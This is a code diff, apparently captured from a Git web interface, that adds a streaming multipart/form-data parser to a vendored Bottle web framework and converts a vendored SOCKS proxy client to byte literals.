from collections import MutableMapping as DictMixin
|
||||
from collections import MutableMapping as DictMixin, defaultdict
|
||||
from inspect import getargspec
|
||||
|
||||
unicode = unicode
|
||||
@@ -1137,6 +1138,399 @@ class Bottle(object):
|
||||
# HTTP and WSGI Tools ##########################################################
|
||||
###############################################################################
|
||||
|
||||
# Multipart parsing stuff
|
||||
|
||||
class StopMarkupException(BottleException):
|
||||
pass
|
||||
|
||||
|
||||
HYPHEN = tob('-')
|
||||
CR = tob('\r')
|
||||
LF = tob('\n')
|
||||
CRLF = CR + LF
|
||||
LFCRLF = LF + CR + LF
|
||||
HYPHENx2 = HYPHEN * 2
|
||||
CRLFx2 = CRLF * 2
|
||||
CRLF_LEN = len(CRLF)
|
||||
CRLFx2_LEN = len(CRLFx2)
|
||||
|
||||
MULTIPART_BOUNDARY_PATT = re.compile(r'^multipart/.+?boundary=(.+?)(;|$)')
|
||||
|
||||
class MPHeadersEaeter:
|
||||
end_headers_patt = re.compile(tob(r'(\r\n\r\n)|(\r(\n\r?)?)$'))
|
||||
|
||||
def __init__(self):
|
||||
self.headers_end_expected = None
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
self._meth_map = {
|
||||
CR: self._eat_lf,
|
||||
HYPHEN: self._eat_last_hyphen
|
||||
}
|
||||
self.stopped = False
|
||||
|
||||
def eat(self, chunk, base):
|
||||
pos = self.eat_meth(chunk, base)
|
||||
if pos is None: return
|
||||
if self.eat_meth != self._eat_headers:
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
base = pos
|
||||
self.eat_meth = self._eat_headers
|
||||
return self.eat(chunk, base)
|
||||
# found headers section end, reset eater
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
return pos
|
||||
|
||||
def _eat_last_hyphen(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == HYPHEN:
|
||||
self.stopped = True
|
||||
return base + 1
|
||||
raise HTTPError(422, 'Last hyphen was expected, got (first 2 symbols slice): %s' % chunk_start)
|
||||
|
||||
def _eat_lf(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == LF: return base + 1
|
||||
invalid_sequence = CR + chunk_start
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
|
||||
def _eat_first_crlf_or_last_hyphens(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CRLF: return base + 2
|
||||
if len(chunk_start) == 1:
|
||||
self.eat_meth = self._meth_map.get(chunk_start)
|
||||
elif chunk_start == HYPHENx2:
|
||||
self.stopped = True
|
||||
return base + 2
|
||||
if self.eat_meth is None:
|
||||
raise HTTPError(422, 'Malformed headers, invalid section start: %s' % chunk_start)
|
||||
|
||||
def _eat_headers(self, chunk, base):
|
||||
expected = self.headers_end_expected
|
||||
if expected is not None:
|
||||
expected_len = len(expected)
|
||||
chunk_start = chunk[base:expected_len]
|
||||
if chunk_start == expected:
|
||||
self.headers_end_expected = None
|
||||
return base + expected_len - CRLFx2_LEN
|
||||
chunk_start_len = len(chunk_start)
|
||||
if not chunk_start_len: return
|
||||
if chunk_start_len < expected_len:
|
||||
if expected.startswith(chunk_start):
|
||||
self.headers_end_expected = expected[chunk_start_len:]
|
||||
return
|
||||
self.headers_end_expected = None
|
||||
if expected == LF: # we saw CRLFCR
|
||||
invalid_sequence = CR + chunk_start[0:1]
|
||||
# NOTE we don not catch all CRLF-malformed errors, but only obvious ones
|
||||
# to stop doing useless work
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
else:
|
||||
assert expected_len >= 2 # (CR)LFCRLF or (CRLF)CRLF
|
||||
self.headers_end_expected = None
|
||||
assert self.headers_end_expected is None
|
||||
s = self.end_headers_patt.search(chunk, base)
|
||||
if s is None: return
|
||||
end_found = s.start(1)
|
||||
if end_found >= 0: return end_found
|
||||
end_head = s.group(2)
|
||||
if end_head is not None:
|
||||
self.headers_end_expected = CRLFx2[len(end_head):]
|
||||
|
||||
|
||||
class MPBodyMarkup:
|
||||
def __init__(self, boundary):
|
||||
self.markups = []
|
||||
self.error = None
|
||||
if CR in boundary:
|
||||
raise HTTPError(422, 'The `CR` must not be in the boundary: %s' % boundary)
|
||||
boundary = HYPHENx2 + boundary
|
||||
self.boundary = boundary
|
||||
token = CRLF + boundary
|
||||
self.tlen = len(token)
|
||||
self.token = token
|
||||
self.trest = self.trest_len = None
|
||||
self.abspos = 0
|
||||
self.abs_start_section = 0
|
||||
self.headers_eater = MPHeadersEaeter()
|
||||
self.cur_meth = self._eat_start_boundary
|
||||
self._eat_headers = self.headers_eater.eat
|
||||
self.stopped = False
|
||||
self.idx = idx = defaultdict(list) # 1-based indices for each token symbol
|
||||
for i, c in enumerate(token, start=1):
|
||||
idx[c].append([i, token[:i]])
|
||||
|
||||
def _match_tail(self, s, start, end):
|
||||
idxs = self.idx.get(s[end - 1])
|
||||
if idxs is None: return
|
||||
slen = end - start
|
||||
assert slen <= self.tlen
|
||||
for i, thead in idxs: # idxs is 1-based index
|
||||
search_pos = slen - i
|
||||
if search_pos < 0: return
|
||||
if s[start + search_pos:end] == thead: return i # if s_tail == token_head
|
||||
|
||||
def _iter_markup(self, chunk):
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
cur_meth = self.cur_meth
|
||||
abs_start_section = self.abs_start_section
|
||||
start_next_sec = 0
|
||||
skip_start = 0
|
||||
tlen = self.tlen
|
||||
eat_data, eat_headers = self._eat_data, self._eat_headers
|
||||
while True:
|
||||
try:
|
||||
end_section = cur_meth(chunk, start_next_sec)
|
||||
except StopMarkupException:
|
||||
self.stopped = True
|
||||
return
|
||||
if end_section is None: break
|
||||
if cur_meth == eat_headers:
|
||||
sec_name = 'headers'
|
||||
start_next_sec = end_section + CRLFx2_LEN
|
||||
cur_meth = eat_data
|
||||
skip_start = 0
|
||||
elif cur_meth == eat_data:
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
else:
|
||||
assert cur_meth == self._eat_start_boundary
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
|
||||
# if the body starts with a hyphen,
|
||||
# we will have a negative abs_end_section equal to the length of the CRLF
|
||||
abs_end_section = self.abspos + end_section
|
||||
if abs_end_section < 0:
|
||||
assert abs_end_section == -CRLF_LEN
|
||||
end_section = -self.abspos
|
||||
yield sec_name, (abs_start_section, self.abspos + end_section)
|
||||
abs_start_section = self.abspos + start_next_sec + skip_start
|
||||
self.abspos += len(chunk)
|
||||
self.cur_meth = cur_meth
|
||||
self.abs_start_section = abs_start_section
|
||||
|
||||
def _eat_start_boundary(self, chunk, base):
    """Consume the boundary that opens the multipart body.

    Returns the chunk-relative end of the zero-length "data" section
    preceding the first boundary, or None when more input is needed.
    Raises ``HTTPError(422)`` when the body starts with neither a
    hyphen (the boundary) nor a CR.
    """
    if self.trest is None:
        # No partially-matched boundary pending: inspect the first byte.
        chunk_start = chunk[base: base + 1]
        if not chunk_start: return
        # A leading CR means data precedes the boundary: scan normally.
        if chunk_start == CR: return self._eat_data(chunk, base)
        boundary = self.boundary
        # Full boundary right at the start: report an end CRLF_LEN
        # *before* base (the negative offset handled by _iter_markup).
        if chunk.startswith(boundary): return base - CRLF_LEN
        if chunk_start != boundary[:1]:
            raise HTTPError(
                422, 'Invalid multipart/formdata body start, expected hyphen or CR, got: %s' % chunk_start)
        # Chunk starts like the boundary but is shorter (or diverges
        # later): remember the full boundary as the pending match for
        # _eat_data to verify.
        self.trest = boundary
        self.trest_len = len(boundary)
    end_section = self._eat_data(chunk, base)
    if end_section is not None: return end_section
|
||||
|
||||
def _eat_data(self, chunk, base):
    """Scan ``chunk`` from ``base`` for the boundary token, stepping
    one token-length window at a time.

    Returns the chunk-relative position where the data section ends,
    or None when the chunk is exhausted without completing a boundary;
    in that case any partial match at the chunk edge is carried over
    in ``self.trest`` / ``self.trest_len`` for the next chunk.
    """
    chunk_len = len(chunk)
    token, tlen, trest, trest_len = self.token, self.tlen, self.trest, self.trest_len
    start = base
    match_tail = self._match_tail
    part = None
    # Walk the chunk in windows of the token length.
    while True:
        end = start + tlen
        if end > chunk_len:
            # Less than a full window left; handle the remainder in
            # the edge-matching pass below.
            part = chunk[start:]
            break
        if trest is not None:
            # A token prefix matched earlier: check whether the rest
            # of the token follows right here.
            if chunk[start:start + trest_len] == trest:
                data_end = start + trest_len - tlen
                self.trest_len = self.trest = None
                return data_end
            else:
                trest_len = trest = None
        # Does the tail of this window begin a boundary token?
        matched_len = match_tail(chunk, start, end)
        if matched_len is not None:
            if matched_len == tlen:
                # The window is exactly the token: data ends where
                # this window begins.
                self.trest_len = self.trest = None
                return start
            else:
                # Only a token prefix fits at the window tail; expect
                # the remaining bytes in the next window (or chunk).
                trest_len, trest = tlen - matched_len, token[matched_len:]
        start += tlen
    # process the tail of the chunk
    if part:
        part_len = len(part)
        if trest is not None:
            if part_len < trest_len:
                # Leftover is shorter than the expected token rest: it
                # must be a prefix of it to keep the match alive.
                if trest.startswith(part):
                    trest_len -= part_len
                    trest = trest[part_len:]
                    part = None
                else:
                    trest_len = trest = None
            else:
                if part.startswith(trest):
                    # Token completed inside the leftover bytes.
                    data_end = start + trest_len - tlen
                    self.trest_len = self.trest = None
                    return data_end
                trest_len = trest = None

        if part is not None:
            assert trest is None
            # The leftover may itself end with the head of the token.
            matched_len = match_tail(part, 0, part_len)
            if matched_len is not None:
                trest_len, trest = tlen - matched_len, token[matched_len:]
    # No boundary completed in this chunk: persist partial-match state.
    self.trest_len, self.trest = trest_len, trest
|
||||
|
||||
def _parse(self, chunk):
    """Consume one chunk and record every section the markup iterator
    emits as a ``[name, (start, end)]`` entry in ``self.markups``."""
    record = self.markups.append
    for sec_name, span in self._iter_markup(chunk):
        record([sec_name, span])
|
||||
|
||||
def parse(self, chunk):
    """Feed one body chunk to the parser.

    After the first failure every later call becomes a no-op; the
    original exception is kept in ``self.error`` for the caller to
    re-raise when the multipart data is actually accessed.
    """
    if self.error is None:
        try:
            self._parse(chunk)
        except Exception as caught:
            self.error = caught
|
||||
|
||||
|
||||
class MPBytesIOProxy:
    """Read-only file-like view over the window ``[start, end)`` of a
    seekable binary source (the spooled request body).

    Positions reported by :meth:`tell` / accepted by :meth:`seek` are
    relative to the window start, so the proxy behaves like a
    standalone file object for multipart file uploads.  The proxy does
    not own the source: :meth:`close` is a no-op.
    """

    def __init__(self, src, start, end):
        self._src = src      # underlying seekable binary file-like
        self._st = start     # absolute window start in src
        self._end = end      # absolute window end (exclusive) in src
        self._pos = start    # current absolute position in src

    def tell(self):
        """Return the current position relative to the window start."""
        return self._pos - self._st

    def seek(self, pos, whence=0):
        """Move the window-relative position.

        ``whence`` follows the standard file convention (0 = window
        start, 1 = current position, 2 = window end) and defaults to 0,
        keeping the original single-argument behavior.  The resulting
        position is clamped to the window.
        """
        if whence == 1:
            pos += self.tell()
        elif whence == 2:
            pos += self._end - self._st
        if pos < 0:
            pos = 0
        self._pos = min(self._st + pos, self._end)

    def read(self, sz=None):
        """Read up to ``sz`` bytes from the window.

        ``None`` or a negative size reads everything remaining; at the
        window end (or for ``sz == 0`` — BUGFIX: the original read the
        whole remainder for a zero size) an empty bytes object is
        returned, matching regular file semantics.
        """
        max_sz = self._end - self._pos
        if max_sz <= 0 or sz == 0:
            return b''
        if sz is not None and sz > 0:
            sz = min(sz, max_sz)
        else:
            sz = max_sz
        self._src.seek(self._pos)
        self._pos += sz
        return self._src.read(sz)

    def writable(self):
        # The proxy is strictly read-only.
        return False

    def fileno(self):
        raise OSError('Not supported')

    @property
    def closed(self):
        # BUGFIX: file objects expose ``closed`` as a property, not a
        # method — the original ``self._src.closed()`` raised
        # TypeError ('bool' object is not callable).  Mirror the
        # source's property here.
        return self._src.closed

    def close(self):
        # Never close the shared source: several fields of one request
        # may proxy the same spooled body.
        pass
|
||||
|
||||
|
||||
class MPHeader:
    """Value object for one parsed multipart header line."""

    def __init__(self, name, value, options):
        # name:    the header name (before the colon)
        # value:   the primary header value (before any ';' options)
        # options: dict mapping lowercase option names to their values
        self.name, self.value, self.options = name, value, options
|
||||
|
||||
|
||||
class MPFieldStorage:
    """One field of a multipart/formdata body, populated lazily from
    the spooled request body using the section markup produced by the
    body parser."""

    # Splits a header remainder into "key", "key=value" or
    # 'key="value"' pieces separated by ';' (or end of string).
    _patt = re.compile(tonat('(.+?)(=(.+?))?(;|$)'))

    def __init__(self):
        self.name = None      # field name (Content-Disposition "name")
        self.value = None     # decoded value for non-file fields
        self.filename = None  # original filename for file uploads
        self.file = None      # MPBytesIOProxy for file uploads
        self.ctype = None     # Content-Type of the part, if present
        self.headers = {}     # header name -> MPHeader

    def read(self, src, headers_section, data_section, max_read):
        """Populate this field from ``src`` given the absolute
        ``[start, end)`` slices of its header and data sections.

        Returns the number of bytes loaded into memory; raises
        ``HTTPError(413)`` when that would exceed ``max_read`` and
        ``HTTPError(422)`` when no field name was found.
        """
        start, end = headers_section
        sz = end - start
        has_read = sz
        if has_read > max_read:
            raise HTTPError(413, 'Request entity too large')
        src.seek(start)
        headers_raw = tonat(src.read(sz))
        for header_raw in headers_raw.splitlines():
            header = self.parse_header(header_raw)
            self.headers[header.name] = header
            if header.name == 'Content-Disposition':
                self.name = header.options['name']
                self.filename = header.options.get('filename')
            elif header.name == 'Content-Type':
                self.ctype = header.value
        if self.name is None:
            raise HTTPError(422, 'Noname field found while parsing multipart/formdata body: %s' % header_raw)
        if self.filename is not None:
            # File upload: expose a lazy window over the spooled body
            # instead of loading the data into memory.
            self.file = MPBytesIOProxy(src, *data_section)
        else:
            # Plain form value: load it into memory, counted against
            # the remaining max_read budget.
            start, end = data_section
            sz = end - start
            if sz:
                has_read += sz
                if has_read > max_read:
                    raise HTTPError(413, 'Request entity too large')
                src.seek(start)
                self.value = tonat(src.read(sz))
            else:
                self.value = ''
        return has_read

    @classmethod
    def parse_header(cls, s):
        """Parse one raw header line into an :class:`MPHeader`.

        The piece before the first ';' becomes the header value; the
        remaining ';'-separated pieces become options with lowercased
        keys and unquoted values.
        """
        htype, rest = s.split(':', 1)
        opt_iter = cls._patt.finditer(rest)
        # The first regex match is the header value itself.
        hvalue = next(opt_iter).group(1).strip()
        dct = {}
        for it in opt_iter:
            k = it.group(1).strip()
            v = it.group(3)
            if v is not None:
                v = v.strip('"')
            dct[k.lower()] = v
        return MPHeader(name=htype, value=hvalue, options=dct)

    @classmethod
    def iter_items(cls, src, markup, max_read):
        """Yield one :class:`MPFieldStorage` per (headers, data) pair
        in ``markup``; ``max_read`` caps the total bytes loaded into
        memory across all fields."""
        iter_markup = iter(markup)
        # check & skip empty data (body should start from empty data)
        null_data = next(iter_markup, None)
        if null_data is None: return
        sec_name, [start, end] = null_data
        assert sec_name == 'data'
        if end > 0:
            raise HTTPError(
                422, 'Malformed multipart/formdata, unexpected data before the first boundary at: [%d:%d]'
                % (start, end))
        headers = next(iter_markup, None)
        data = next(iter_markup, None)
        while headers:
            sec_name, headers_slice = headers
            assert sec_name == 'headers'
            if not data:
                raise HTTPError(
                    422, 'Malformed multipart/formdata, no data found for the field at: [%d:%d]'
                    % tuple(headers_slice))
            sec_name, data_slice = data
            assert sec_name == 'data'
            field = cls()
            has_read = field.read(src, headers_slice, data_slice, max_read=max_read)
            # Shrink the in-memory budget by what this field consumed.
            max_read -= has_read
            yield field
            headers = next(iter_markup, None)
            data = next(iter_markup, None)
|
||||
|
||||
|
||||
class BaseRequest(object):
|
||||
""" A wrapper for WSGI environment dictionaries that adds a lot of
|
||||
@@ -1326,6 +1720,10 @@ class BaseRequest(object):
|
||||
|
||||
@DictProperty('environ', 'bottle.request.body', read_only=True)
|
||||
def _body(self):
|
||||
mp_markup = None
|
||||
mp_boundary_match = MULTIPART_BOUNDARY_PATT.match(self.environ.get('CONTENT_TYPE', ''))
|
||||
if mp_boundary_match is not None:
|
||||
mp_markup = MPBodyMarkup(tob(mp_boundary_match.group(1)))
|
||||
try:
|
||||
read_func = self.environ['wsgi.input'].read
|
||||
except KeyError:
|
||||
@@ -1335,12 +1733,15 @@ class BaseRequest(object):
|
||||
body, body_size, is_temp_file = BytesIO(), 0, False
|
||||
for part in body_iter(read_func, self.MEMFILE_MAX):
|
||||
body.write(part)
|
||||
if mp_markup is not None:
|
||||
mp_markup.parse(part)
|
||||
body_size += len(part)
|
||||
if not is_temp_file and body_size > self.MEMFILE_MAX:
|
||||
body, tmp = NamedTemporaryFile(mode='w+b'), body
|
||||
body.write(tmp.getvalue())
|
||||
del tmp
|
||||
is_temp_file = True
|
||||
body.multipart_markup = mp_markup
|
||||
self.environ['wsgi.input'] = body
|
||||
body.seek(0)
|
||||
return body
|
||||
@@ -1378,7 +1779,7 @@ class BaseRequest(object):
|
||||
def POST(self):
|
||||
""" The values of :attr:`forms` and :attr:`files` combined into a single
|
||||
:class:`FormsDict`. Values are either strings (form values) or
|
||||
instances of :class:`cgi.FieldStorage` (file uploads).
|
||||
instances of :class:`MPBytesIOProxy` (file uploads).
|
||||
"""
|
||||
post = FormsDict()
|
||||
# We default to application/x-www-form-urlencoded for everything that
|
||||
@@ -1389,18 +1790,15 @@ class BaseRequest(object):
|
||||
post[key] = value
|
||||
return post
|
||||
|
||||
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
|
||||
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
|
||||
if key in self.environ: safe_env[key] = self.environ[key]
|
||||
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
|
||||
|
||||
if py3k:
|
||||
args['encoding'] = 'utf8'
|
||||
post.recode_unicode = False
|
||||
data = cgi.FieldStorage(**args)
|
||||
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
|
||||
data = data.list or []
|
||||
for item in data:
|
||||
body = self.body
|
||||
markup = body.multipart_markup
|
||||
if markup is None:
|
||||
raise HTTPError(400, '`boundary` required for mutlipart content')
|
||||
elif markup.error is not None:
|
||||
raise markup.error
|
||||
for item in MPFieldStorage.iter_items(body, markup.markups, self.MEMFILE_MAX):
|
||||
if item.filename is None:
|
||||
post[item.name] = item.value
|
||||
else:
|
||||
|
||||
16
thirdparty/socks/socks.py
vendored
16
thirdparty/socks/socks.py
vendored
@@ -185,23 +185,23 @@ class socksocket(socket.socket):
|
||||
# We'll receive the server's response to determine which
|
||||
# method was selected
|
||||
chosenauth = self.__recvall(2)
|
||||
if chosenauth[0:1] != chr(0x05).encode():
|
||||
if chosenauth[0:1] != b'\x05':
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
# Check the chosen authentication method
|
||||
if chosenauth[1:2] == chr(0x00).encode():
|
||||
if chosenauth[1:2] == b'\x00':
|
||||
# No authentication is required
|
||||
pass
|
||||
elif chosenauth[1:2] == chr(0x02).encode():
|
||||
elif chosenauth[1:2] == b'\x02':
|
||||
# Okay, we need to perform a basic username/password
|
||||
# authentication.
|
||||
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
authstat = self.__recvall(2)
|
||||
if authstat[0:1] != chr(0x01).encode():
|
||||
if authstat[0:1] != b'\x01':
|
||||
# Bad response
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
if authstat[1:2] != chr(0x00).encode():
|
||||
if authstat[1:2] != b'\x00':
|
||||
# Authentication failed
|
||||
self.close()
|
||||
raise Socks5AuthError((3, _socks5autherrors[3]))
|
||||
@@ -209,7 +209,7 @@ class socksocket(socket.socket):
|
||||
else:
|
||||
# Reaching here is always bad
|
||||
self.close()
|
||||
if chosenauth[1] == chr(0xFF).encode():
|
||||
if chosenauth[1:2] == b'\xff':
|
||||
raise Socks5AuthError((2, _socks5autherrors[2]))
|
||||
else:
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
@@ -219,7 +219,7 @@ class socksocket(socket.socket):
|
||||
# use the IPv4 address request even if remote resolving was specified.
|
||||
try:
|
||||
ipaddr = socket.inet_aton(destaddr)
|
||||
req = req + chr(0x01).encode() + ipaddr
|
||||
req = req + b'\x01' + ipaddr
|
||||
except socket.error:
|
||||
# Well it's not an IP number, so it's probably a DNS name.
|
||||
if self.__proxy[3]:
|
||||
|
||||
Reference in New Issue
Block a user